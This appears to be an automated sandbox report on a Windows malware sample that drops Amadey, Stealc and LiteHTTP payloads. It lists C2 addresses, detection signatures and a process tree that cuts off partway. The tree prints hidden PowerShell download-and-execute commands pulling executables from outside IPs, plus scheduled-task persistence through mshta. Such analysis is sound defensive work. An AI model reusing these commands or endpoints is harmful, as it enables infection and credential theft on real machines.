Analysis

  • max time kernel
    139s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/03/2025, 03:21

General

  • Target

    2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe

  • Size

    938KB

  • MD5

    fcfdf8b1f22083b9211fcbafd2627421

  • SHA1

    78c528b9822bb4bd2e649b52c1c5a968cdcf4f98

  • SHA256

    2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916

  • SHA512

    78f5fc4f16df3f67296c9e6d88c7ca3070cba0f1474c2b417449c9bb300cf5b3c2fc6034052101c1c85f9b59e8e7b7476f5ab7b5b0e8a73ff98d94a94451e5f2

  • SSDEEP

    24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8aynF:OTvC/MTQYxsWR7ayn

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

traff1

Attributes
  • url_path

    /gtthfbsb2h.php

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file 24 IoCs
  • Uses browser remote debugging 2 TTPs 20 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 22 IoCs
  • Identifies Wine through registry keys 2 TTPs 16 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 16 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3380
    • C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe
      "C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2168
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn FIQBDma0qjp /tr "mshta C:\Users\Admin\AppData\Local\Temp\QR69SLapL.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1712
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn FIQBDma0qjp /tr "mshta C:\Users\Admin\AppData\Local\Temp\QR69SLapL.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4500
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\QR69SLapL.hta
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4068
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EDYKREPIL7EGEZ2W2H6FEOIJMXISHMXK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:220
          • C:\Users\Admin\AppData\Local\TempEDYKREPIL7EGEZ2W2H6FEOIJMXISHMXK.EXE
            "C:\Users\Admin\AppData\Local\TempEDYKREPIL7EGEZ2W2H6FEOIJMXISHMXK.EXE"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4004
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4204
              • C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
                "C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1712
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                  8⤵
                  • Uses browser remote debugging
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:1492
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa9826cc40,0x7ffa9826cc4c,0x7ffa9826cc58
                    9⤵
                      PID:4384
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1860 /prefetch:2
                      9⤵
                        PID:1168
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2140 /prefetch:3
                        9⤵
                          PID:1264
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2432 /prefetch:8
                          9⤵
                            PID:216
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3184 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:2292
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:1380
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4556,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4504 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:3896
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8
                            9⤵
                              PID:3464
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4876 /prefetch:8
                              9⤵
                                PID:3820
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4932 /prefetch:8
                                9⤵
                                  PID:2816
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4280,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4708 /prefetch:8
                                  9⤵
                                    PID:4348
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5160,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5172 /prefetch:8
                                    9⤵
                                      PID:4756
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8
                                      9⤵
                                        PID:5252
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5404 /prefetch:8
                                        9⤵
                                          PID:5292
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5392,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5312 /prefetch:8
                                          9⤵
                                            PID:5676
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5528,i,15542220627900593311,4362356860710061128,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5012 /prefetch:2
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:5512
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                          8⤵
                                          • Uses browser remote debugging
                                          • Enumerates system info in registry
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                          • Suspicious use of FindShellTrayWindow
                                          PID:6076
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa982746f8,0x7ffa98274708,0x7ffa98274718
                                            9⤵
                                            • Checks processor information in registry
                                            • Enumerates system info in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:6060
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,6324158629805032877,32088723830913483,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
                                            9⤵
                                              PID:3480
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,6324158629805032877,32088723830913483,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
                                              9⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5276
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,6324158629805032877,32088723830913483,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2976 /prefetch:8
                                              9⤵
                                                PID:2332
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2232,6324158629805032877,32088723830913483,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                9⤵
                                                • Uses browser remote debugging
                                                PID:5444
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2232,6324158629805032877,32088723830913483,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                                                9⤵
                                                • Uses browser remote debugging
                                                PID:5452
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2232,6324158629805032877,32088723830913483,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1
                                                9⤵
                                                • Uses browser remote debugging
                                                PID:1400
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2232,6324158629805032877,32088723830913483,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
                                                9⤵
                                                • Uses browser remote debugging
                                                PID:4980
                                          • C:\Users\Admin\AppData\Local\Temp\10109460101\7ce8190080.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10109460101\7ce8190080.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:1440
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn 9L8zSmaARTd /tr "mshta C:\Users\Admin\AppData\Local\Temp\1IIOx50P7.hta" /sc minute /mo 25 /ru "Admin" /f
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1900
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn 9L8zSmaARTd /tr "mshta C:\Users\Admin\AppData\Local\Temp\1IIOx50P7.hta" /sc minute /mo 25 /ru "Admin" /f
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4756
                                            • C:\Windows\SysWOW64\mshta.exe
                                              mshta C:\Users\Admin\AppData\Local\Temp\1IIOx50P7.hta
                                              8⤵
                                              • Checks computer location settings
                                              • System Location Discovery: System Language Discovery
                                              PID:4092
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KRPANIYTDP2SGZV2H7WDNLVN57L3Y4SX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                9⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4876
                                                • C:\Users\Admin\AppData\Local\TempKRPANIYTDP2SGZV2H7WDNLVN57L3Y4SX.EXE
                                                  "C:\Users\Admin\AppData\Local\TempKRPANIYTDP2SGZV2H7WDNLVN57L3Y4SX.EXE"
                                                  10⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5772
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10109470121\am_no.cmd" "
                                            7⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5140
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 2
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              • Delays execution with timeout.exe
                                              PID:6132
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2924
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                9⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4136
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2948
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                9⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2148
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3364
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                9⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3952
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /create /tn "eXUiEmazEBS" /tr "mshta \"C:\Temp\ELjh4OoPk.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:5264
                                            • C:\Windows\SysWOW64\mshta.exe
                                              mshta "C:\Temp\ELjh4OoPk.hta"
                                              8⤵
                                              • Checks computer location settings
                                              • System Location Discovery: System Language Discovery
                                              PID:5516
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                9⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:6096
                                                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                  10⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:6012
                                          • C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"
                                            7⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Downloads MZ/PE file
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Loads dropped DLL
